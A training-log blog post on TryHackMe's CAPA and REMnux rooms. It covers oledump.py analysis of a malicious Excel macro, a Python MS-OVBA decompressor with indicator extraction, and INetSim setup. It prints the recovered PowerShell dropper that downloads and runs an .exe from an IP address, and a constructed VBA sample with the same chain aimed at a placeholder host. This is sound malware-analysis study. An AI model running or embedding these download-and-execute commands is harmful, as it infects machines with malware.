
Training Update v0.53

Friday. Next we move on to the CAPA: The Basics module!

When I started this module I had no idea what CAPA was, so rather than trying and failing to explain it myself I will show the introduction blurb from this room below –

[Screenshot: the room's introduction to CAPA]

In this room we are tasked with analysing results that CAPA has already produced, rather than running the tool ourselves on the host VM, as that takes ages just to load PowerShell.

The objectives of this room are: Tool Overview: How CAPA Works; Dissecting CAPA Results Part 1: General Information, MITRE and MAEC; Dissecting CAPA Results Part 2: Malware Behavior Catalogue; Dissecting CAPA Results Part 3: Namespaces; and Dissecting CAPA Results Part 4: Capability.

This room was... a lot. A lot of fluff about CAPA and the top-level namespaces, rules, detections and various other things. I don't feel this was that useful to me personally, but it's always good to have an awareness of these types of tools and how they work.

Next we move on to the REMnux: Getting Started module!

So when I started this module/room I had no idea what REMnux was, but apparently it is a VM used predominantly by security professionals dealing with incident response and malware. An explanation of the VM is shown below –

[Screenshot: the room's description of REMnux]

In the coming tasks we use a tool called oledump.py to conduct static analysis of a potentially malicious Excel file.

[Screenshot: oledump.py listing the data streams of the Excel file]

“Based on OleDump’s file analysis, a VBA script might be embedded in the document and found inside xl/vbaProject.bin. Therefore, oledump will assign this with an index of A, though this can sometimes differ. The A (index) + numbers are called data streams.”

“Now, we should be aware of the data stream with the capital letter M. This means there is a Macro, and you might want to check out this data stream, 'VBA/ThisWorkbook'.”

[Screenshot: hexdump of the 'VBA/ThisWorkbook' macro stream]

The raw hexdump is not very useful, so let's convert this into something more readable.

[Screenshot: oledump.py output with the VBA macro decompressed]

“When we use this parameter, oledump will automatically decompress any compressed VBA macros it finds into a more readable format, making it easier to analyse the contents of the macros.”

As we can see, there appears to be a PowerShell script within this .xls file, and it looks to be doing some bad stuff! We are going to use our prior knowledge of CyberChef to strip out the surrounding strings and see what comes out!

[Screenshot: CyberChef recipe recovering the PowerShell command]

“powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } -PassThru; Invoke-WebRequest -Uri "http://193.203.203.67/rt/Doc-3737122pdf.exe" -OutFile $TempFile; Start-Process $TempFile;”
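To make the oledump steps above less of a black box, here is an added example (not code from the room or from oledump.py) of what happens under the hood when a macro stream is decompressed: VBA module source is stored in vbaProject.bin in the MS-OVBA compressed container format, and the decompress step is exactly what turns the unreadable hexdump into source. The block implements that format in both directions, checks it against a hand-built vector from the spec, and finishes with the kind of triage CyberChef was used for above: pulling URLs, the PowerShell invocation and the auto-execute hook out of the recovered source. SAMPLE_VBA and SPEC_VECTOR are constructed for this example, and the URL in the sample is a placeholder, not the address from the room.

```python
"""MS-OVBA VBA source compression, the form that oledump.py -v expands.
Added example, not code from the TryHackMe room or from oledump.py. Implements
MS-OVBA 2.4.1 in both directions, then triages the decompressed macro source.
SAMPLE_VBA (constructed, placeholder URL) and SPEC_VECTOR are built here."""
import re
import struct

CHUNK_SIGNATURE = 0b011   # 3-bit signature in every chunk header
MAX_CHUNK = 4096          # decompressed bytes per chunk


def _bit_count(difference):
    # ceil(log2(difference)), floored at 4: width of a copy token's offset field
    return max(4, (difference - 1).bit_length())


def decompress(container: bytes) -> bytes:
    """Expand a CompressedContainer: signature byte 0x01 followed by chunks."""
    if not container or container[0] != 0x01:
        raise ValueError("missing MS-OVBA signature byte 0x01")
    out, pos = bytearray(), 1
    while pos < len(container):
        header, = struct.unpack_from("<H", container, pos)
        if (header >> 12) & 0x07 != CHUNK_SIGNATURE:
            raise ValueError("bad chunk signature at offset %d" % pos)
        chunk_end = min(len(container), pos + (header & 0x0FFF) + 3)  # size field omits 3
        pos, chunk_start = pos + 2, len(out)
        if not header >> 15:                        # raw chunk, copied verbatim
            out += container[pos:pos + MAX_CHUNK]
            pos = chunk_end
            continue
        while pos < chunk_end:
            flags, pos = container[pos], pos + 1    # one flag bit per token, LSB first
            for bit in range(8):
                if pos >= chunk_end:
                    break
                if not (flags >> bit) & 1:          # literal token: one byte
                    out.append(container[pos])
                    pos += 1
                    continue
                token, = struct.unpack_from("<H", container, pos)
                pos += 2
                bc = _bit_count(len(out) - chunk_start)
                length = (token & (0xFFFF >> bc)) + 3
                src = len(out) - (token >> (16 - bc)) - 1   # high bc bits hold offset-1
                if src < chunk_start:
                    raise ValueError("copy token reaches before chunk start")
                for i in range(length):             # byte-wise so overlapping copies work
                    out.append(out[src + i])
    return bytes(out)


def _compress_chunk(data: bytes) -> bytes:
    # Greedy LZ77 encoding of up to 4096 bytes as one compressed chunk
    body, pos = bytearray(), 0
    while pos < len(data):
        flags, tokens = 0, bytearray()
        for bit in range(8):
            if pos >= len(data):
                break
            best_len = best_off = 0
            if pos:                                 # nothing to copy at chunk start
                bc = _bit_count(pos)
                max_len, max_off = (0xFFFF >> bc) + 3, 1 << bc
                for off in range(1, min(pos, max_off) + 1):
                    n = 0
                    while pos + n < len(data) and n < max_len and data[pos + n] == data[pos - off + n]:
                        n += 1
                    if n > best_len:
                        best_len, best_off = n, off
            if best_len >= 3:                       # a copy token only pays off at 3+ bytes
                flags |= 1 << bit
                tokens += struct.pack("<H", ((best_off - 1) << (16 - bc)) | (best_len - 3))
                pos += best_len
            else:
                tokens.append(data[pos])
                pos += 1
        body.append(flags)
        body += tokens
    if len(body) > MAX_CHUNK:
        raise ValueError("incompressible chunk; raw chunks are not emitted here")
    header = 0x8000 | (CHUNK_SIGNATURE << 12) | (len(body) + 2 - 3)
    return struct.pack("<H", header) + bytes(body)


def compress(data: bytes) -> bytes:
    return b"\x01" + b"".join(_compress_chunk(data[i:i + MAX_CHUNK])
                              for i in range(0, len(data), MAX_CHUNK))


URL_RE = re.compile(rb"https?://[^\s\"'<>()]+")


def extract_iocs(vba_source: bytes) -> dict:
    """Cheap triage of decompressed macro source: URLs, PowerShell, auto-exec hooks."""
    low = vba_source.lower()
    return {"urls": [u.decode() for u in URL_RE.findall(vba_source)],
            "powershell": b"powershell" in low,
            "auto_exec": any(t in low for t in (b"workbook_open", b"auto_open", b"document_open"))}


# Constructed sample, loosely modelled on the macro in the room; not the real one.
SAMPLE_VBA = (b'Private Sub Workbook_Open()\r\n'
              b'    cmd = "powershell -WindowStyle hidden -executionpolicy bypass; "\r\n'
              b'    cmd = cmd & "Invoke-WebRequest -Uri http://stage.example.invalid/Doc.exe -OutFile $env:TEMP\\d.exe; "\r\n'
              b'    cmd = cmd & "Start-Process $env:TEMP\\d.exe"\r\n'
              b'    Shell cmd, vbHide\r\n'
              b'End Sub\r\n')

# Hand-built from the spec: header 0xB00B (compressed, sig 011, chunk size 14), flag 0x00 +
# eight literals "ABCDEFGH", then flag 0x01 + copy token 0x7005 (offset 8, length 8).
SPEC_VECTOR = bytes.fromhex("01 0bb0 00 4142434445464748 01 0570")
```

Run `decompress(compress(SAMPLE_VBA))` and then `extract_iocs` on the result to see the URL, the PowerShell flag and the Workbook_Open hook fall out; feed a real stream by reading the module stream bytes from vbaProject.bin and slicing from the source offset the dir stream gives for that module. The `src < chunk_start` check is deliberate: a malformed copy token in a crafted document should fail loudly rather than silently read from the previous chunk.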

Next we proceed to use a tool called INetSim, which simulates common internet services (DNS, HTTP and so on) so that during dynamic analysis we can observe how potentially malicious software behaves on the network without letting it reach the real internet.

We start by pointing the local DNS setting on the REMnux box back to our attack box, so that the sample's name lookups are answered there, and then run the inetsim command.
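The INetSim side of that step, as an added example rather than anything taken from the room: the lines in /etc/inetsim/inetsim.conf that matter here. 10.10.10.1 is a placeholder for whichever box runs INetSim, the key names are INetSim's own, and the analysis VM's /etc/resolv.conf would then carry `nameserver 10.10.10.1`. The fake .exe mapping is what lets the "download the payload" step below return a harmless stand-in binary instead of a failed request.

```conf
# /etc/inetsim/inetsim.conf (excerpt). 10.10.10.1 = the box running INetSim (placeholder).
start_service dns
start_service http
start_service https

# Bind the simulated services to the analysis network interface, not 127.0.0.1
service_bind_address    10.10.10.1

# Answer every DNS query with our own address so any host name the dropper
# resolves lands on the fake HTTP server
dns_default_ip          10.10.10.1

# Serve a benign stand-in for anything ending in .exe, so Invoke-WebRequest
# "succeeds" and the next stage of the dropper can be observed
http_fakefile           exe     sample_gui.exe      x-msdos-program
```

One caveat worth noting with the command recovered above: it fetches from a literal IP address, so DNS redirection alone will not catch that request; traffic to that address also has to be routed to the INetSim host. The page does not show how that was done in the room.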

[Screenshots: the DNS setting and INetSim starting its services]

Download the payload

[Screenshots: the payload being downloaded through INetSim]

Capture the flag

[Screenshots: capturing the flag]

Interesting room and Interesting tools!

Until next time & don’t sleepwalk through life!

Selamat tinggal (goodbye)